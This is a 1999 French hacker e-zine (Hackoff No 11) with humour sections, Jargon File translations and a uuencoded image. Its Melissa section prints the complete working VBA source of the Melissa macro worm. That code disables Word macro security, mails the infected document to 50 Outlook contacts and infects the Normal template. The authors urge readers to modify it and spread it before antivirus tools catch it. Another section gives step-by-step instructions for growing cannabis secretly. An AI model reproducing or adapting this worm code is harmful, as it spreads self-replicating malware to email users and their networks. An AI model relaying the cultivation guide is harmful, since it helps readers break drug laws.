             01.04.99              - H@CKOFF No11 - * TCP Hippie * - 

  
¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø
   
             _/    _/    _/_/      _/_/_/  _/    _/    _/_/    _/_/_/_/ _/_/_/_/      
            _/    _/  _/    _/  _/        _/  _/    _/    _/  _/       _/
           _/_/_/_/  _/_/_/_/  _/        _/_/      _/    _/  _/_/_/   _/_/_/
          _/    _/  _/    _/  _/        _/  _/    _/    _/  _/        /
         _/    _/  _/    _/    _/_/_/  _/    _/    _/_/    _/       _/   
 
;¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø;

   
    ________________________________________________________________________
   /                                                                        \
  /	Bienvenue dans ce Hackoff No 11 Special Havane Edition. Pour le 1er /
 / avril 1999 voici un poisson a coller dans le dos de vos messages.       /
| Au programme de ce hacKIFf : Fumeurs de havanes, Mangeurs de            /
 \ poissons, Amateurs de virus, Traduction du jargon file (suite), Loi   /
  \ de Murphy (extrait) et bien sur, cacahuetes grillees (uuencodees)   /
   \ Les auteurs impliques dans ce Hackoff sont :                      /
    \_____________________________________  __________________________/
                                          \ |
                                           \|   
                                           ___________                             
                                       .,:;> mAdE By <;:,.                         
                                          /           \           
                                         /  Silk.....  \
________________________________________/  Tobozo.....  \______________________________________
¢£¤¥ ¦§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦/  Yopyop.......  \§¨©ª«¬-®¯°±²³´µ·¸¹º»¿øØÞþæ¡¢£¤¥ ¦§-*`
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯/  Kwyjibo........  \¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
                  		     /  UUencode.........  \
                                    /  Ordralfabétix......  \
                     --------8<----+-----8<---------8<-------\---8<--+-------8<---        
                                  /____________....___________\
                                                             
                   __________________________________________________________________________ 
 __________       /   TabLe des mAtières :                           Auteur                  \
/ HACK0ff  \     |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
]-=v0L 11=-[     |     [1]Disclaimer                                  Tobozo
\>avril 99 /     |     [2]De la Weed a Volonte pour 50 balles !       Silk
 ¯¯¯¯¯¯¯¯¯¯      |     [3]Melissa (adaptation de la fiche symantec)   Tobozo
                 |     [4]Loi de murphy (best of)                     Tobozo
                 |     [5]Jargon file (traduction)                    YopYop
                 |     [6]Cacahuetes grillees                        UUencode    
                 |
---------8<------+--------------8<---------------------8<---------------------8<--------------
                 ¦
                 : 
                 .  
                       .ed$$$F
                     z$$$$$$"
                    4$$$$$$F          .$*"""*$P   
                    $$$$$$$be.       z"     z"
                  z" $        *c    e"     /
                 P   '           "*"
               ."     $                    r
               F      'L                   3
              $        "c                   .
             .          ^b                  $
             $            *c   z$*"""**b.   4
             P              *$P          *$ 4
             F                 "$c         *d
             F                    "*e.      "
           $cb                       "$c
           $$$c                         *c
           3$$$$$$ec                      $.
            $$$$$$$$$$.                    "c
             $$$$$$$$$$c                    'c
              *$$$$$$$$$c                    "c
                "$$$$$$$"               $ 3   *
                  "$$                   *.J    $
                    "$b                        3r
                      "$b.                      $
                        ^*$e.                   $
                           "$$$c                ^F
                              ^*$$$e.           JF
                                    "**$$$beee$$P
  
¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø¤º°`°º¤ø,¸¸,ø

                          _        _______________________        _
                           `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
__________________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\___________________________________


	Tout fumeur est prié de ne pas fumer devant la police. Ce mag n'est
pas une incitation a la consommation de cannabis (l'etat n'aime pas ce qu'il ne controle
pas donc c'est un  service rendu a la nation que de se faire cultivateur en herbe). Ce
texte est un mode d'emploi pour faire pousser de la ciboulette qui a été traduit par altarien 
et remis au gout du jour  par Silk. Si en lisant ce disclaimer vos paupieres s'alourdissent et
vos muscles se détendent, alors nous declinons toute responsabilite quant a ces symptomes et
nions l'existence de l'edf-gdf dans la participation a l'eclairage (ressources naturelles
avant tout). Et surtout n'oubliez pas : petard du matin, poil dans la main; petard du soir,
perte de memoire.

                   _        _______________________________________    
   _
                    `^°*;:,.> De la Weed a Volonte pour 50 balles
<.,:;*°^`
___________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________


	Silk, le blaireau de service, va t' expliquer comment faire de la
bonne Weed homegrown, je parle bien sur de la Beu / Skunk qui fait un trou dans ton budget
tous les mois... Et surtout comment EVITER de passer par des putains de dealers qui se
font du fric sur ton dos et qui sont tout gentils alors qu'ils en ont rien a foutre de 
ta gueule.

	Je sais pas pour toi, mais je trouve que le temps de l'alcool est
fini, on laisse ca aux pochtrons qui se defoncent la tete a la Kro ou au Sky...
De nos jours je trouve que l'on dit plus facilement a un pote que l'on
invite chez soi : 
"Ouais, mais d'abord tu veux pas fumer quelque chose ?"
;)) plutot que la phrase de l'alcolique qui croit ne pas en etre un :
"Tu veux boire quelque chose ?" ====> ca fait pitie !

	Le Teushi c'est degeulasse : ta barre brune est toute chimique et
pleine de saloperies (meme du plastic souvent, et on s'en rend rarement compte !), la Weed
c'est carrement mieux, c'est du produit Naturel ! :) et c'est un meilleur delire...

Donc ! : Voila comment faire de la Weed pour 50 balles !

        Tout d'abord faut recuperer des graines : bon la soit tu vas a
Dam, ou tu les recuperes dans la Weed avant de la fumer (c'est ce que je fais et ca
marche tres bien : faut prendre les grosses graines, de bonne Weed si possible). Une 
vingtaine de graines est suffisante. Jusque la ca t'a rien coute, vu que tu fumes un 25 
tous les 2 jours, ca pose pas probleme... et je connais personne qui fume les graines ;)

        Ensuite faut mettre les graines dans du coton bien humide et
pas trop epais au dessus. Tjrs pas un rond.

        Une fois que les graines ont bien germe (4-5 jours), faut les
planter. Arf, la faut recuperer un pot bien large au dessus ou simplement un bac de 5 / 10 cm
de hauteur et de 40 de long (suivant ton nombre de graines...) mettre de la bonne terre
dedans. Bien humidifier et planter les graines espacées. Faut que ca soit humide mais moins 
que le coton c'est a dire absolument jamais sec, surtout au debut.

        Eclairage : c'est ca qui coute 50 balles. Y te faut une lampe
pour plantes, 25 balles. C'est un lampe bleue, souvent, et qui favorise la croissance des
plantes, ca se trouve un peu partout, exemple : quincaillerie, magazin de jardinage, de 
bricolage, ou meme magazin d'annimaux :  aquariophile, oiseaux, plantes d'eau, etc...
Tu peux utiliser un spot si t'en as un, ou un truc genial parce qu'il y
a pas besoin de le fixer dans le mur : une lampe d'architecte (le genre de lampe qui se 
deplie avec des ressorts et qui se fixe sur le bureau). Ensuite, mais c'est meme pas 
obligatoire : un 'programmateur journalier' : une horloge electrique qui allume ou coupe 
le courant suivant les heures programmees : lumiere de 6 H du mat a 10 H du soir.
pareil 5 $ => 25 balles.

	Vala et au bout de 2-3 semaines les plants seront asssez gros pour
etre replantes ailleurs : un terrain vague par exemple, ou une friche industrielle a toi de
trouver un coin ou personne n'ira piquer ta weed ;) L'ideal c'est d'aller l'arroser de temps en
temps... et bientot vous aurez de bons gros pieds, reste plus qu'a les faire secher secher : 
bien ventiler (genre avec un chauffage d'appoint, en position froid/ventilation) au moment du 
sechage, sinon, ca pourrit).
Un fois secs : le meilleur moment : plus qu'a fumer vos supers plans
cultives avec amour :)

SilK : emminence@nightmail.com

                  _        _______________________        _
                  `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________
	
	si vous ne savez pas exactement ce dont est capable un virus
un bon conseil : telechargez maintenant un bon antivirus et installez le
car mieux vaut prevenir que guerir. Ce texte n'a pas pour but de vous
inciter a véroller votre entourage, mais plutot a démontrer que le
monopole peut aussi avoir des mauvais cotés. Niark niark niark. M'enfin abusez
pas trop avec ca, y a des administrateurs reseaux qui pleurent et qui se
font virer apres alors c'est pas drole...

                  _        ________________        _
                  `^°*;:,.> M e l i s s a <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\________________________________
____________________________________________________________________________
        (traduction et adaptation de la fiche symantec By Tobozo).
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Yesss encore un virus heberge par notre cher ami billou. Qu'est ce qu'il
peut etre genereux celui la alors ! C'est les serveurs de mail qui vont
etre contents avec tout le boulot qu'ils vont recevoir. En moins de trois
semaines de vie, ce virus a reussi a faire parler de lui a la tele, quelle
efficacite !!

 ________________
 > Presentation <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________

W97M.Melissa.A (connu aussi sous le nom de code W97M.Mailissa) est un
macro virus dont les agissements sont assez marrants. Des qu'un pauvre bougre
ouvre un document infecté, le virus essaye d'envoyer des copies de lui meme 
par email a 50 personnes en utilisant microfosse outlook. 
S'il est ouvert avec word 2000, il supprime egalement les parametres de 
securite qui servent normalement a prevenir l'utilisateur qu'une macro
peut contenir des virus. Dans le meilleur des cas, il va se greffer a tous
les documents ulterieurement créés.

A l'ouverture du fichier, le virus verifie si le mass mailing a deja eu
lieu auparavant en regardant cette cle de la base de registres : 

"HKEY_CURRENT_USER\Software\Microsoft\Office\" 
Si la valeur de cette cle est "Melissa?" , il balance la puree, en
revanche, si la valeur est  "...by Kwyjibo", il calme le jeu et se contente de
véroler chaque nouveau document.

Dans le premier cas, il va utiliser une requete MAPI pour recupere le
profil de Outlook et creer un email en prenant 50 adresses dans le carnet. Le
sujet du courrier est normalement : 
"Important Message From USERNAME", ou USERNAME est le nom de
l'expediteur, information trouvee evidemment dans le profil Outlook.
Le corps du document : 
"Here is that document you asked for ... don't show anyone else ;-)" 
Et il attache le document infecté.
Et il envoie les 50 messages...baoum le serveur de mail !
Au passage, "HKEY_CURRENT_USER\Software\Microsoft\Office" est une
entree créée dans la base de registres lors de l'install de microfaust aufist. 
Une autre routine de cette petite merveille est un petit verificateur
qui va comparer les minutes et la date (le premier avril, il se declenche 1
minute apres chaque heure). Si le document est ouvert a la bonne heure, il se
verra ajoute : " Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters. Game's over. I'm outta here." 
Bon allez on vous a fait assez baver, voici le code source dudit virus 
(intact)...a vous de le modifier et de bien vous amuser avant qu'il ne
soit trop connu et trop facilement reperable (il est peut etre deja trop
tard, mais y a toujours des andouilles pour desactiver leur anti virus alors 
qu'ils utilisent ce vivier qu'on appelle microsoft).

 _______________
 > Code Source <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________________________________

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") <> "" Then
  CommandBars("Macro").Controls("Security...").Enabled = False
  System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security",
"Level") = 1&
Else
  CommandBars("Tools").Controls("Macro").Enabled = False
  Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 -
1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by
Kwyjibo" Then
  If UngaDasOutlook = "Outlook" Then
    DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        x = 1
        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
        For oo = 1 To AddyBook.AddressEntries.Count
            Peep = AddyBook.AddressEntries(x)
            BreakUmOffASlice.Recipients.Add Peep
            x = x + 1
            If x > 50 Then oo = AddyBook.AddressEntries.Count
         Next oo
         BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
         BreakUmOffASlice.Body = "Here is that document you asked for
... don't show anyone else ;-)"
         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
         BreakUmOffASlice.Send
         Peep = ""
    Next y
    DasMapiName.Logoff
  End If
  System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by
Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
  If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
  Set ToInfect = ADI1
  ADI1.Name = "Melissa"
  DoAD = True
End If

If NTI1.Name <> "Melissa" Then
  If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
  Set ToInfect = NTI1
  NTI1.Name = "Melissa"
  DoNT = True
End If
    
If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
  Do While ADI1.CodeModule.Lines(1, 1) = ""
    ADI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
  Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If
  
If DoAD = True Then
  Do While NTI1.CodeModule.Lines(1, 1) = ""
    NTI1.CodeModule.DeleteLines 1
  Loop
  ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
  Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
    ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
    BGN = BGN + 1
  Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name,
"Document") = False) Then
  ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
  ActiveDocument.Saved = True 
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for using all my letters. 
Game's over.  I'm outta here."
End Sub


                  _        _______________________        _
                  `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

...tout va toujours de mal en pis.

         _        _____________________________________        _
          `^°*;:,.> Loi de murphy (best of by Tobozo) <.,:;*°^`
_________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\____________________


Principe de Rabelais : 
Lorsqu'une idée est mauvaise, elle ne présente que 20% de
risque d'être copiée. Mais celui qui la copie le mieux a 
80% de chance d'en faire une application très en vogue... 

 ________________
 > Presentation <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________________________________

La loi de Murphy, plus connue sous le nom de loi de l'emmerdement 
maximum (LEM) pourrait être définie sous sa forme la plus générale
comme suit : 
"A un moment donné d'un processus quelconque, si plusieurs issues sont 
envisageables, c'est toujours vers l'issue la moins favorable que le
processus donné s'orientera."

L'inventeur de ce concept, Edsel Murphy, a la réputation d'être très
peu connu chez les ingénieurs et techniciens, ce qui en ferait une <<
illustration >> de la loi qui porte son nom... 

A partir de ce constat, on peut énoncer de nombreuses applications de
cette loi de Murphy.

 _________________
 > Formalisation <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_________________________________________________________

La loi de Murphy peut s'appliquer de deux façons, qui ont chacune une 
formalisation propre: 

 ________________
 > Cas Généraux <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________________________________________

L'énoncé de la loi de Murphy dans un cas général se présente sous la
forme : 
"<contexte> c'est toujours quand <condition> que <issue la moins favorable>" 
Cette loi peut aussi s'appeler le postulat de la tartine.
"Quand une tartine tombe, c'est forcement du cote beurré" 
Les plus malins diront qu'on n'a qu'a la beurrer de l'autre coté...

 __________________________
 > Adaptation Ponctuelles <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\________________________________________________

L'énoncé de la loi de Murphy dans un cas ponctuel se présente sous la
forme : 
"<contexte> il suffit que <option> pour que <issue la moins favorable>" 
Par exemple, on pourra vérifier, a l'occasion, l'énoncé suivant : 
Il suffit que je décide de ne pas prendre mon parapluie pour qu'il
pleuve... 
Et sa réciproque directe : 
...alors que si je décide de prendre mon parapluie, il ne pleuvra pas. 
 _______________________________________
 > Loi de Murphy appliquée a elle meme <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\____________________________________

Nous nous sommes interressés jusqu'a présent a des applications directes
de la loi de Murphy. Voyons a présent les applications indirectes et les
implications de la prédiction de la loi de Murphy. 
Il s'avere que si l'on essaie de prévoir l'issue d'une application de 
la loi de Murphy, et que l'on agit en conséquense, l'issue effective 
n'est jamais celle prévue. 

Par exemple, si l'on considere le cas suivant : 
Avant de sortir, le temps étant incertain, on se dit : Il suffit que 
je décide de ne pas prendre mon parapluie pour qu'il pleuve.... 
On peut alors envisager de réagir en fonction de la loi de Murphy; 
c'est-à-dire d'appliquer la réciproque en se disant "Je vais décider 
de prendre mon parapluie, comme ca, il ne pleuvra pas!" (c'est
logique). 
Mais alors l'issue effective sera toujours inverse de celle prévue, 
(Il pleuvra, et non seulement il pleuvra, mais en plus, le parapluie 
sera retourné par la première rafale de vent ! ).

Pourquoi? Parce que la loi de Murphy s'applique à la prévision 
d'application que l'on a effectuée. 
En appliquant un raisonnement par récurrence des plus simples à cet 
état de fait, il apparaît clairement que 
"De part sa définition même, la loi de Murphy s'applique toujours 
à un degré supérieur de 1 au degré d'application prévu." 

 _____________________
 > Quelques Dérivées <
/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\______________________________________________________

-Lorsque vous oubliez quelque chose, c'est l'indispensable. 
-Rien n'est aussi simple qu'il y paraît. 
-Les délais les plus courts sont toujours rallonger jusqu'à concurrencer 
les délais les plus longs. 
-Si tout semble bien se passer, c'est que vous n'avez manifestement pas 
remarqué la chose qui cloche et qui ne va pas tarder à vous poser tous 
les poblèmes du monde 
-L'Univers n'est pas du tout indifférent à l'intelligence, il lui est 
activement hostile. 
-Il est impossible de faire quoi que ce soit à l'épreuve des imbéciles, 
les imbéciles sont toujours plus ingénieux... ! 
-De nouvelles priorités viennent toujours repousser les urgences. 
- Chez microsoft : Les erreurs indétectables sont en nombre infini, 
contrairement aux erreurs détectables dont le nombre catalogué est très
limité. 
-Faire disparaître un message d'erreur est une utopie : vous n'avez 
simplement pas encore trouvé celui qui l'a remplacé.
-Ce n'est qu'après avoir essayé tout le reste, qu'on lit la 
documentation... C'est à ce moment qu'on se rend compte qu'on l'a
jetée avec l'emballage. 
-Les rages de dents commencent le samedi soir.
-C'est toujours plus cher que prévu. 
-Si tout va bien, ne vous inquiétez pas, ça passera vite. 
-Si vous voyez une lumiere au fond du tunnel, c'est une locomotive
qui vous fonce dessus.
-Une expérience réussie ne doit jamais être reproduite. 
-Tout ce qui se termine est bien, sinon ça aurait pu être bien pire. 

La loi de Murphy est donc imprévisible par essence. Ce qui sera la 
conclusion inéluctable de notre réflexion pour aujourd'hui. 


                  _        _______________________        _
                  `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

...a lire sans moderation.

          _        ___________________________________        _
           `^°*;:,.> Jargon file (traduction YopYop) <.,:;*°^`
__________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\_____________________


	Kailas est un monde dont l'acces n'est trouvable qu'après avoir
atteint l'état ",4" et la recherche est la clef de la porte. Alors en gros si 
la savate est en toi tu es sur le bon chemin.

Extrait et traduction du Jargon file :

Joyeuses paques!

*Easter egg [inspiré d'une vieille coutume qui consiste a trouver des
oeufs) n. 
1. Un message ou une blague caché dans un code de programmation et ne
pouvant etre theoriquement trouve que par des personnes qui
desassemblent ou
qui regardent de pres ledit code. 
2. Un message, un graphique, ou un effet sonore emis par un programme
(ou, sur un PC, par la BIOS ROM) en reponse a une demande de documentation sur
un jeu de commandes ou de raccourcis claviers, prevu a but humoristique pour
afficher les infos sur les auteurs du programme. Un exemple connu sur quelques OS :
lors de la frappe au clavier de la phrase 'make love' l'OS repond 'not war?'.
Beaucoup d'ordinateurs personnels ont des Easter-eggs plus elabores caches dans
la ROM y comprennant la liste des developpeurs, noms, orientations politiques, 
extraits musicaux, et (dans certains cas) une photo de l'equipe
complete.


*legalese n. verbiage dense et pedant decrivant un langage, une
specification
de produit, ou un standard d'interface; un texte conçu pour assombrir
les choses et exige l'analyse d'un avocat pour etre lu (voir license
microsoft). 
Bien que les hackers ne soient pas effrayes par une haute densite
d'informations ni par une haute complexite dans un langage (en fait, ils adorent); ils 
l'associent à la déception, aux costards, et aux situations dans
lesquelles les hackers se tapent les restes. 


*plokta /plok't*/ [Acronyme pour `Press Lots Of Keys To Abort'] v.
Appuyer sur plusieurs touchez au hasard dans le but desespere d'obtenir une reponse
du systeme lors d'un blocage. On peut dire que les doigts dansent la
plokta quand on essaye d'interrompre un programme inconnu, ou quand on essaye
de savoir si le systeme est en train de patiner ou s'il est reellement
plante.
Plokta peut aussi etre utilise en essayant de trouver une sequence pour
une operation particuliere. En general quelqu'un qui passe en 'mode Plokta'
place ses deux mains a plat sur le clavier et appuie copieusement sur le plus
de touches possibles, en esperant une reponse utile. Des exemples etaient 
souvent rencontres dans les messages mail ou sur les articles de USENET 
ecrit par de nouveaux utilisateurs.. Le texte finissait un peu comme ca :

             ^X^C       
             q  
             quit       
             :q 
             ^C 
             end        
             x  
             exit       
             ZZ 
             ^D 
             ?  
             help

alors que l'utilisateur essayait vainement de trouver la bonne sequence
pour quitter son emulation de terminal, avec toutes les mauvaises
entrees qui s'empilaient a la fin du message

Vous retrouverez sur le prochain numero la suite
des aventures de YopYop au pays du jargon file.

YopYop

                  _        _______________________        _
                  `^°*;:,.> Ð ï $ © £ Å ï M Ê ® <.,:;*°^`
_________________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\__________________________

...l'ami cahouete me fait la fete

          _        __________________________________        _
           `^°*;:,.> Cacahuetes grillees (UUencodé) <.,:;*°^`
__________________/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\______________________


Mode d'emploi : telecharger un encodeur/decodeur et l'appliquer au
morceau de txt ci dessous, vous aurez ainsi de quoi vous faire
au moins deux bonnes cacahuetes grillées.

<-----cut here----->
_=_
_=_ Part 001 of 001 of file peanut
_=_

begin 666 peanut
M1TE&.#=AE@`Y`/<`````````,P``9@``F0``S```_P`S```S,P`S9@`SF0`S
MS``S_P!F``!F,P!F9@!FF0!FS`!F_P"9``"9,P"99@"9F0"9S`"9_P#,``#,
M,P#,9@#,F0#,S`#,_P#_``#_,P#_9@#_F0#_S`#__S,``#,`,S,`9C,`F3,`
MS#,`_S,S`#,S,S,S9C,SF3,SS#,S_S-F`#-F,S-F9C-FF3-FS#-F_S.9`#.9
M,S.99C.9F3.9S#.9_S/,`#/,,S/,9C/,F3/,S#/,_S/_`#/_,S/_9C/_F3/_
MS#/__V8``&8`,V8`9F8`F68`S&8`_V8S`&8S,V8S9F8SF68SS&8S_V9F`&9F
M,V9F9F9FF69FS&9F_V:9`&:9,V:99F:9F6:9S&:9_V;,`&;,,V;,9F;,F6;,
MS&;,_V;_`&;_,V;_9F;_F6;_S&;__YD``)D`,YD`9ID`F9D`S)D`_YDS`)DS
M,YDS9IDSF9DSS)DS_YEF`)EF,YEF9IEFF9EFS)EF_YF9`)F9,YF99IF9F9F9
MS)F9_YG,`)G,,YG,9IG,F9G,S)G,_YG_`)G_,YG_9IG_F9G_S)G__\P``,P`
M,\P`9LP`F<P`S,P`_\PS`,PS,\PS9LPSF<PSS,PS_\QF`,QF,\QF9LQFF<QF
MS,QF_\R9`,R9,\R99LR9F<R9S,R9_\S,`,S,,\S,9LS,F<S,S,S,_\S_`,S_
M,\S_9LS_F<S_S,S___\``/\`,_\`9O\`F?\`S/\`__\S`/\S,_\S9O\SF?\S
MS/\S__]F`/]F,_]F9O]FF?]FS/]F__^9`/^9,_^99O^9F?^9S/^9___,`/_,
M,__,9O_,F?_,S/_,____`/__,___9O__F?__S/___P````T-#1H:&B@H*#4U
M-4-#0U!04%U=76MK:WAX>(:&AI.3DZ&AH:ZNKKN[N\G)R=;6UN3DY/'Q\?__
M_P``````````````````````````````````````````````````````````
M`````````````````````"'Y!`$``-<`+`````"6`#D`0`C^`*\)'$BPH,&#
M"!,J7,CP6CISJP"1`O0GCT1`@:R58]6PH\>/($.*-+B*%"EG)TFI>N8,I2ID
M*I^91(E,)LV7)YW55`GS):"10!F>`\3RV1\]<Y#JN91G3E,]>2XAS8.I:1ZH
M=#I9O6IU3SJ&>5PB>^E,U4R9*5NF3(GS)5F38Y_93!E7+,^U?R:R,F<MG;J@
M!5FI1>D,:AXZ>:YVTK.XDZ<\GAY[6BRYL1[)<SPEE6JYL=.MB8LZ$RTS3U["
M8W6B+JOZ),X_%.&:I5DVM=RULE&:)"43YDF8-T?S%&ZNH!ZU8T]"G6JX>=/)
M2QE+AE[Y<F?&62'GZ83X:M(Y<TC^_5$[RMDH5>A;JJ>VOB5[]>Y9PF>M4Q5J
M^X`\20RKNS^IY&K=9=]-:PU&2BD#Z9$63OZ-ALQH+<G'TDS_N55A6B99Z!9P
M>`&"#""#M62???(YPQY+)SI3#7S4//,>A.N5J-Y8#Q+VQS-CL;**CJSDD=-=
M'(K5%C)_?-40*X!TLF!J%&+8I%G)T0CD?[61964R.!5(EY6CZ'&41!-9I*1]
M/<65(8:]Y?$78&RVZ69(T`"2)"#E0,/*1A*QPLJ:;_;IYY\(I6/6C[H]N)M*
M:D%)H%E_`.HH4:3H<8ZC#(53EW]#VL<362R1F&64.:DGDRJ>4'HD@V5IAQ1W
MVE7%F'3_VGGRZF*J=I)48E,=MMT<3Y3S%3J$74AC6Q.NU."9P6[ZX("C00FE
MLJ/V=)*$BDY(X"CE++1;?U7,82M4K&HF&632O3IN9+%"U]FXT26UF%1YB'9<
M2S6JQ^Q\(N:K7EKUU4>*C\$*&>5LK@5L4K$`SC3;3P+Q9NU,75;Q[V?Z^6@1
MKOD=QMV_Z&ZGE%/9/09O9E0E]M]X9,*WTHOOH0CABN[E.V*PJ9A'2BK(G%?O
M2S?JM*U*&.J6*8<#?VB0-9YD2N6%!";L7TK'O-2IJ%3#B-:6%.9EQ;3WTH>O
MROHFI^"_5G0"9AY6J**'D::.E`XK@>BYRM@T[>9;)Z-,5(HY_FPW9$T@G@1-
M87*(8HI,2;\IRS-';3?N^$'6`*SXT]-B"`B?CV?^N#K'65B77,W2^,R@A69)
M8DO%:1Y4(./TK7E8%>Z+4WDGE1)PM%82/F*%8^FA>D/IY`%3G@*ID\XY@9QS
M#BO*,\^\.="H(WU?0!TW>DRQ-Q@@DP$C/BAPPV8(WT2N/^ZAA<MQ]ZZN5S&%
MF/M/?78K5X@9!@7?!JE3WH"_'>O6U<D2DK#*PI::V&5(/]+4?V(WE]\`(G4>
M,4=M_B.17"&&55F9%<DNF,%S32=6B6F*5G)5%+/X:($%DA+X&/2CA!$,:(0I
M785`9SNW"`=`=4N-,Y(!M)3DH7S7_@@$:I1C%:<\9E;EL@RL9-48=%$G5HW)
M2G=NY8DG0*@H>=-7:^BEFF$9:E\QA`EL>`<7_XC.-7%!((&*%4.@,>X:QUG%
M8*!0A<?([XB6H<YDTA6K)2:17?!"3';F,*'AU.MK+_H:C+SVH&71R!EY>&&P
MBK8I^,A12VO1E"I^<@[!H>0/C\$55^@7+A"*RS./R2#)%N.M5;'/*9_\S;WD
MDTBSI&)_[1G->UH4H?EL:%\]>T;>,)2P!68*)?(1D-&N`3`F;2F`04I)`P78
